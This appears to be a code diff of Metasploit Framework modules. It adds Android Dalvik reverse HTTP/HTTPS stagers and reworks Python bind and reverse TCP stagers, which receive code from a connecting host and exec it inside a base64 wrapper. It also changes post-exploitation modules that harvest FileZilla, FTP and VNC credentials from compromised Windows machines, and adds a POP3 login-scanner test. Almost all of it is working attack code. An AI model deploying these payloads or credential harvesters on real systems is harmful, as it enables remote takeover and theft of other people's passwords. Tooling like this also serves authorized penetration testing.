+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+module Metasploit3
+
+include Msf::Payload::Stager
+include Msf::Payload::Dalvik
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Dalvik Reverse HTTP Stager',
+'Description' => 'Tunnel communication over HTTP',
+'Author' => 'anwarelmakrahy',
+'License' => MSF_LICENSE,
+'Platform' => 'android',
+'Arch' => ARCH_DALVIK,
+'Handler' => Msf::Handler::ReverseHttp,
+'Stager' => {'Payload' => ""}
+))
+
+register_options(
+[
+OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+], self.class)
+end
+
+def generate_jar(opts={})
+host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+jar = Rex::Zip::Jar.new
+
+classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + host + ":" + port)
+string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+jar.add_file("classes.dex", fix_dex_header(classes))
+
+files = [
+[ "AndroidManifest.xml" ],
+[ "resources.arsc" ]
+]
+
+jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+jar.build_manifest
+
+cert, key = generate_cert
+jar.sign(key, cert, [cert])
+
+jar
+end
+
+end
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+include Msf::Payload::Stager
+include Msf::Payload::Dalvik
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'Dalvik Reverse HTTPS Stager',
+'Description' => 'Tunnel communication over HTTPS',
+'Author' => 'anwarelmakrahy',
+'License' => MSF_LICENSE,
+'Platform' => 'android',
+'Arch' => ARCH_DALVIK,
+'Handler' => Msf::Handler::ReverseHttps,
+'Stager' => {'Payload' => ""}
+))
+
+register_options(
+[
+OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+], self.class)
+end
+
+def generate_jar(opts={})
+host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+jar = Rex::Zip::Jar.new
+
+classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + host + ":" + port)
+string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+jar.add_file("classes.dex", fix_dex_header(classes))
+
+files = [
+[ "AndroidManifest.xml" ],
+[ "resources.arsc" ]
+]
+
+jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+jar.build_manifest
+
+cert, key = generate_cert
+jar.sign(key, cert, [cert])
+
+jar
+end
+end
@@ -24,10 +24,11 @@ module Metasploit3
 'Handler' => Msf::Handler::ReverseTcp,
 'Stager' => {'Payload' => ""}
 ))
-end
 
-def string_sub(data, placeholder, input)
+register_options(
-data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+[
+OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+], self.class)
 end
 
 def generate_jar(opts={})
@@ -35,46 +36,20 @@ module Metasploit3
 
 classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
 
-string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST']
+string_sub(classes, 'XXXX127.0.0.1 ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
-string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT']
+string_sub(classes, 'YYYY4444 ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
+string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
 jar.add_file("classes.dex", fix_dex_header(classes))
 
 files = [
 [ "AndroidManifest.xml" ],
-[ "res", "drawable-mdpi", "icon.png" ],
-[ "res", "layout", "main.xml" ],
 [ "resources.arsc" ]
 ]
 
 jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
 jar.build_manifest
 
-x509_name = OpenSSL::X509::Name.parse(
+cert, key = generate_cert
-"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-)
-key = OpenSSL::PKey::RSA.new(1024)
-cert = OpenSSL::X509::Certificate.new
-cert.version = 2
-cert.serial = 1
-cert.subject = x509_name
-cert.issuer = x509_name
-cert.public_key = key.public_key
-
-# Some time within the last 3 years
-cert.not_before = Time.now - rand(3600*24*365*3)
-
-# From http://developer.android.com/tools/publishing/app-signing.html
-# """
-# A validity period of more than 25 years is recommended.
-#
-# If you plan to publish your application(s) on Google Play, note
-# that a validity period ending after 22 October 2033 is a
-# requirement. You can not upload an application if it is signed
-# with a key whose validity expires before that date.
-# """
-# The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
-cert.not_after = Time.at( 0x78045d81 + rand( 0x7fffffff - 0x78045d81 ))
-
 jar.sign(key, cert, [cert])
 
 jar
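The hunk above drops the inline OpenSSL signing code in favour of a shared generate_cert helper (whose addition is visible at the very top of this diff). A sketch of what that helper presumably does, reconstructed from the deleted lines; the real helper lives in the Dalvik payload mixin and may differ in detail:

  require 'openssl'

  # Sketch only: self-signed certificate material for signing the APK jar.
  def generate_cert
    x509_name = OpenSSL::X509::Name.parse(
      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
    )
    key  = OpenSSL::PKey::RSA.new(1024)
    cert = OpenSSL::X509::Certificate.new
    cert.version    = 2
    cert.serial     = 1
    cert.subject    = x509_name
    cert.issuer     = x509_name
    cert.public_key = key.public_key
    # Valid from some time within the last 3 years...
    cert.not_before = Time.now - rand(3600 * 24 * 365 * 3)
    # ...until a random date after 2033-10-22, per Google Play's requirement.
    cert.not_after  = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))
    return cert, key
  end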
@@ -15,36 +15,38 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Python Bind TCP Stager',
-'Description' => 'Python connect stager',
+'Description' => 'Listen for a connection',
 'Author' => 'Spencer McIntyre',
 'License' => MSF_LICENSE,
 'Platform' => 'python',
 'Arch' => ARCH_PYTHON,
 'Handler' => Msf::Handler::BindTcp,
 'Stager' => {'Payload' => ""}
 ))
 end
 
 #
 # Constructs the payload
 #
 def generate
-cmd = ''
 # Set up the socket
-cmd += "import socket,struct\n"
+cmd = "import socket,struct\n"
-cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-cmd += "s.listen(1)\n"
+cmd << "s.listen(1)\n"
-cmd += "c,a=s.accept()\n"
+cmd << "c,a=s.accept()\n"
-cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
+cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
-cmd += "d=c.recv(4096)\n"
+cmd << "d=c.recv(4096)\n"
-cmd += "while len(d)!=l:\n"
+cmd << "while len(d)!=l:\n"
-cmd += "\td+=c.recv(4096)\n"
+cmd << "\td+=c.recv(4096)\n"
-cmd += "exec(d,{'s':c})\n"
+cmd << "exec(d,{'s':c})\n"
 
 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
+b64_stub = "import base64,sys;exec(base64.b64decode("
-return cmd
+b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+b64_stub << Rex::Text.encode_base64(cmd)
+b64_stub << "')))"
+return b64_stub
 end
 
 def handle_intermediate_stage(conn, payload)
@@ -15,34 +15,36 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Python Reverse TCP Stager',
-'Description' => 'Reverse Python connect back stager',
+'Description' => 'Connect back to the attacker',
 'Author' => 'Spencer McIntyre',
 'License' => MSF_LICENSE,
 'Platform' => 'python',
 'Arch' => ARCH_PYTHON,
 'Handler' => Msf::Handler::ReverseTcp,
 'Stager' => {'Payload' => ""}
 ))
 end
 
 #
 # Constructs the payload
 #
 def generate
-cmd = ''
 # Set up the socket
-cmd += "import socket,struct\n"
+cmd = "import socket,struct\n"
-cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
+cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
-cmd += "d=s.recv(4096)\n"
+cmd << "d=s.recv(4096)\n"
-cmd += "while len(d)!=l:\n"
+cmd << "while len(d)!=l:\n"
-cmd += "\td+=s.recv(4096)\n"
+cmd << "\td+=s.recv(4096)\n"
-cmd += "exec(d,{'s':s})\n"
+cmd << "exec(d,{'s':s})\n"
 
 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
+b64_stub = "import base64,sys;exec(base64.b64decode("
-return cmd
+b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+b64_stub << Rex::Text.encode_base64(cmd)
+b64_stub << "')))"
+return b64_stub
 end
 
 def handle_intermediate_stage(conn, payload)
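Both Python stagers above now emit a version-agnostic decoder stub. A standalone sketch of the same wrapping, using Ruby's stdlib Base64 in place of Rex::Text and a placeholder payload (both of which are stand-ins, not framework code):

  require 'base64'

  # Illustrative only: py_payload stands in for the generated socket code above.
  py_payload = "print('stage would run here')\n"

  b64_stub = "import base64,sys;exec(base64.b64decode("
  b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
  b64_stub << Base64.strict_encode64(py_payload)
  b64_stub << "')))"

  # The dict keyed on sys.version_info[0] picks str() on Python 2 and a
  # bytes() conversion on Python 3, so the same one-liner feeds
  # base64.b64decode cleanly under either interpreter.
  puts b64_stub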
@@ -8,19 +8,25 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/meterpreter_python'
 require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit3
 include Msf::Sessions::MeterpreterOptions
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Python Meterpreter',
-'Description' => 'Run a meterpreter server in Python',
+'Description' => %q{
-'Author' => ['Spencer McIntyre'],
+Run a meterpreter server in Python. Supported Python versions
+are 2.5 - 2.7 and 3.1 - 3.4.
+},
+'Author' => 'Spencer McIntyre',
 'Platform' => 'python',
 'Arch' => ARCH_PYTHON,
 'License' => MSF_LICENSE,
-'Session' => Msf::Sessions::Meterpreter_Python_Python))
+'Session' => Msf::Sessions::Meterpreter_Python_Python
+))
+register_advanced_options([
+OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ])
+], self.class)
 end
 
 def generate_stage
@@ -29,6 +35,11 @@ module Metasploit3
 met = File.open(file, "rb") {|f|
 f.read(f.stat.size)
 }
 
+if datastore['DEBUGGING']
+met = met.sub("DEBUGGING = False", "DEBUGGING = True")
+end
+
 met
 end
 end
@@ -33,13 +33,7 @@ class Metasploit3 < Msf::Post
 return
 end
 
-drive = session.sys.config.getenv('SystemDrive')
+@progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
-case session.platform
-when /win64/i
-@progs = drive + '\\Program Files (x86)\\'
-when /win32/i
-@progs = drive + '\\Program Files\\'
-end
 
 filezilla = check_filezilla
 if filezilla != nil
@@ -147,20 +141,39 @@ class Metasploit3 < Msf::Post
 source_id = nil
 end
 
-# report the goods!
-report_auth_info(
+service_data = {
-:host => session.sock.peerhost,
+address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-:port => config['ftp_port'],
+port: config['ftp_port'],
-:sname => 'ftp',
+service_name: 'ftp',
-:proto => 'tcp',
+protocol: 'tcp',
-:user => cred['user'],
+workspace_id: myworkspace_id
-:pass => cred['password'],
+}
-:ptype => "MD5 hash",
-:source_id => source_id,
+credential_data = {
-:source_type => "exploit",
+origin_type: :session,
-:target_host => config['ftp_bindip'],
+jtr_format: 'raw-md5',
-:target_port => config['ftp_port']
+session_id: session_db_id,
-)
+post_reference_name: self.refname,
+private_type: :nonreplayable_hash,
+private_data: cred['password'],
+username: cred['user']
+}
+
+credential_data.merge!(service_data)
+
+credential_core = create_credential(credential_data)
+
+# Assemble the options hash for creating the Metasploit::Credential::Login object
+login_data ={
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+# Merge in the service data and create our Login
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 end
 
 perms.each do |perm|
@@ -190,19 +203,37 @@ class Metasploit3 < Msf::Post
 #the module will crash with an error.
 vprint_status("(No admin information found.)")
 else
-report_auth_info(
+service_data = {
-:host => session.sock.peerhost,
+address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-:port => config['admin_port'],
+port: config['admin_port'],
-:sname => 'filezilla-admin',
+service_name: 'filezilla-admin',
-:proto => 'tcp',
+protocol: 'tcp',
-:user => 'admin',
+workspace_id: myworkspace_id
-:pass => config['admin_pass'],
+}
-:type => "password",
-:source_id => source_id,
+credential_data = {
-:source_type => "exploit",
+origin_type: :session,
-:target_host => config['admin_bindip'],
+session_id: session_db_id,
-:target_port => config['admin_port']
+post_reference_name: self.refname,
-)
+private_type: :password,
+private_data: config['admin_pass'],
+username: 'admin'
+}
+
+credential_data.merge!(service_data)
+
+credential_core = create_credential(credential_data)
+
+# Assemble the options hash for creating the Metasploit::Credential::Login object
+login_data ={
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+# Merge in the service data and create our Login
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 end
 
 p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
@@ -109,14 +109,34 @@ class Metasploit3 < Msf::Post
 else
 source_id = nil
 end
-report_auth_info(
+service_data = {
-:host => host,
+address: host,
-:port => port,
+port: port,
-:source_id => source_id,
+service_name: 'ftp',
-:source_type => "exploit",
+protocol: 'tcp',
-:user => user,
+workspace_id: myworkspace_id
-:pass => pass
+}
-)
+
+credential_data = {
+origin_type: :session,
+session_id: session_db_id,
+post_reference_name: self.refname,
+private_type: :password,
+private_data: pass,
+username: user
+}
+
+credential_data.merge!(service_data)
+
+credential_core = create_credential(credential_data)
+login_data ={
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 end
 end
 
@@ -8,7 +8,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'rex/proto/rfb'
 
 class Metasploit3 < Msf::Post
 
@@ -224,37 +224,79 @@ class Metasploit3 < Msf::Post
 e[:port] = 5900
 end
 print_good("#{e[:name]} => #{e[:hash]} => #{e[:pass]} on port: #{e[:port]}")
-if session.db_record
-source_id = session.db_record.id
+service_data = {
-else
+address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-source_id = nil
+port: e[:port],
-end
+service_name: 'vnc',
-report_auth_info(
+protocol: 'tcp',
-:host => session.sock.peerhost,
+workspace_id: myworkspace_id
-:sname => 'vnc',
+}
-:pass => "#{e[:pass]}",
-:port => "#{e[:port]}",
+# Assemble data about the credential objects we will be creating
-:source_id => source_id,
+credential_data = {
-:source_type => "exploit",
+origin_type: :session,
-:type => 'password'
+session_id: session_db_id,
-)
+post_reference_name: self.refname,
+private_type: :password,
+private_data: "#{e[:pass]}"
+}
+
+# Merge the service data into the credential data
+credential_data.merge!(service_data)
+
+# Create the Metasploit::Credential::Core object
+credential_core = create_credential(credential_data)
+
+# Assemble the options hash for creating the Metasploit::Credential::Login object
+login_data ={
+access_level: 'interactive',
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+# Merge in the service data and create our Login
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 end
 if e[:viewonly_pass] != nil
 print_good("VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}")
-if session.db_record
-source_id = session.db_record.id
+service_data = {
-else
+address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-source_id = nil
+port: e[:port],
-end
+service_name: 'vnc',
-report_auth_info(
+protocol: 'tcp',
-:host => session.sock.peerhost,
+workspace_id: myworkspace_id
-:sname => 'vnc',
+}
-:viewonly_pass => "#{e[:viewonly_pass]}",
-:port => "#{e[:port]}",
+# Assemble data about the credential objects we will be creating
-:source_id => source_id,
+credential_data = {
-:source_type => "exploit",
+origin_type: :session,
-:type => 'password_ro'
+session_id: session_db_id,
-)
+post_reference_name: self.refname,
+private_type: :password,
+private_data: "#{e[:viewonly_pass]}"
+}
+
+# Merge the service data into the credential data
+credential_data.merge!(service_data)
+
+# Create the Metasploit::Credential::Core object
+credential_core = create_credential(credential_data)
+
+# Assemble the options hash for creating the Metasploit::Credential::Login object
+login_data ={
+access_level: 'view_only',
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+# Merge in the service data and create our Login
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 end
 }
 unload_our_hives(userhives)
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post
 'Description' =>
 %q{
 This module gathers information about the files and file paths that logged on users have
-executed on the system. It also will check if the file exists on the system still. This
+executed on the system. It also will check if the file still exists on the system. This
 information is gathered by using information stored under the MUICache registry key. If
 the user is logged in when the module is executed it will collect the MUICache entries
 by accessing the registry directly. If the user is not logged in the module will download
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
 username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
 profile_subkeys = registry_enumkeys(username_reg_path)
 if profile_subkeys.blank?
-print_error("Unable to access ProfileList registry key. Can't continue.")
+print_error("Unable to access ProfileList registry key. Unable to continue.")
 return nil
 end
 
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
 end
 user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
 if user_home_path.blank?
-print_error("Unable to read ProfileImagePath from the registry. Can't continue.")
+print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
 return nil
 end
 full_path = user_home_path.strip
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post
 # If the registry_enumvals returns us nothing then we'll know
 # that the user is most likely not logged in and we'll need to
 # download and process users hive locally.
-print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..")
+print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
 result = process_hive(sys_path, user, muicache, hive_file)
 unless result.nil?
 result.each { |r|
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
 # If the registry_enumvals returns us content we'll know that we
 # can access the registry directly and thus continue to process
 # the content collected from there.
-print_status("User #{user}: Enumerating registry..")
+print_status("User #{user}: Enumerating registry...")
 subkeys.each do |key|
 if key[0] != "@" && key != "LangID" && !key.nil?
 result = check_file_exists(key, user)
@@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post
 ntuser_status = file_exist?(hive_path)
 
 unless ntuser_status == true
-print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.")
+print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.")
 return nil
 end
 
-print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..")
+print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
 local_hive_copy = Rex::Quickfile.new("jtrtmp")
 local_hive_copy.close
 begin
@@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
 # extracting the contents of the MUICache registry key.
 def hive_parser(local_hive_copy, muicache, user)
 results = []
-print_status("Parsing registry content..")
+print_status("Parsing registry content...")
-err_msg = "Error parsing hive. Can't continue."
+err_msg = "Error parsing hive. Unable to continue."
 hive = Rex::Registry::Hive.new(local_hive_copy)
 if hive.nil?
 print_error(err_msg)
@@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post
 # - http://forensicartifacts.com/2010/08/registry-muicache/
 # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
 def run
-print_status("Starting to enumerate MuiCache registry keys..")
+print_status("Starting to enumerate MUICache registry keys...")
 sys_info = sysinfo['OS']
 
 if sys_info =~/Windows XP/ && is_admin?
@@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post
 hive_file = "\\NTUSER.DAT"
 elsif sys_info =~/Windows 7/ && is_admin?
 print_good("Remote system supported: #{sys_info}")
-muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache"
+muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
 hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
 else
 print_error("Unsupported OS or not enough privileges. Unable to continue.")
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post
 "File status",
 ])
 
-print_status("Phase 1: Searching user names..")
+print_status("Phase 1: Searching user names...")
 sys_users, sys_paths, sys_sids = find_user_names
 
 if sys_users.blank?
@@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post
 print_good("Users found: #{sys_users.join(", ")}")
 end
 
-print_status("Phase 2: Searching registry hives..")
+print_status("Phase 2: Searching registry hives...")
 muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
 results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
 
 results.each { |r| table << r }
 
-print_status("Phase 3: Processing results..")
+print_status("Phase 3: Processing results...")
 loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
 print_line("\n" + table.to_s + "\n")
-print_status("Results stored in: #{loot}")
+print_status("Results stored as: #{loot}")
 print_status("Execution finished.")
 end
 
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
 
 # Assemble the information about the SMB service for this host
 service_data = {
-address: session.sock.peerhost,
+address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
 port: 445,
 service_name: 'smb',
 protocol: 'tcp',
@@ -0,0 +1,82 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/pop3'
+
+describe Metasploit::Framework::LoginScanner::POP3 do
+subject(:scanner) { described_class.new }
+
+it_behaves_like 'Metasploit::Framework::LoginScanner::Base'
+it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+context "#attempt_login" do
+
+let(:pub_blank) do
+Metasploit::Framework::LoginScanner::Credential.new(
+paired: true,
+public: "public",
+private: ''
+)
+end
+context "Raised Exceptions" do
+it "Rex::ConnectionError should result in status :connection_error" do
+expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError)
+result = scanner.attempt_login(pub_blank)
+
+expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+expect(result.status).to eq(:connection_error)
+end
+
+it "Timeout::Error should result in status :connection_error" do
+expect(scanner).to receive(:connect).and_raise(Timeout::Error)
+result = scanner.attempt_login(pub_blank)
+
+expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+expect(result.status).to eq(:connection_error)
+end
+
+it "EOFError should result in status :connection_error" do
+expect(scanner).to receive(:connect).and_raise(EOFError)
+result = scanner.attempt_login(pub_blank)
+
+expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+expect(result.status).to eq(:connection_error)
+end
+end
+
+context "Open Connection" do
+let(:sock) {double('socket')}
+
+before(:each) do
+sock.stub(:shutdown)
+sock.stub(:close)
+sock.stub(:closed?)
+expect(scanner).to receive(:connect)
+scanner.stub(:sock).and_return(sock)
+scanner.should_receive(:select).with([sock],nil,nil,0.4)
+end
+
+it "Server returns +OK" do
+expect(sock).to receive(:get_once).exactly(3).times.and_return("+OK")
+expect(sock).to receive(:put).with("USER public\r\n").once.ordered
+expect(sock).to receive(:put).with("PASS \r\n").once.ordered
+
+result = scanner.attempt_login(pub_blank)
+
+expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+expect(result.status).to eq(:success)
+
+end
+
+it "Server Returns Something Else" do
+sock.stub(:get_once).and_return("+ERROR")
+
+result = scanner.attempt_login(pub_blank)
+
+expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+expect(result.status).to eq(:failed)
+expect(result.proof).to eq("+ERROR")
+
+end
+end
+
+end
+end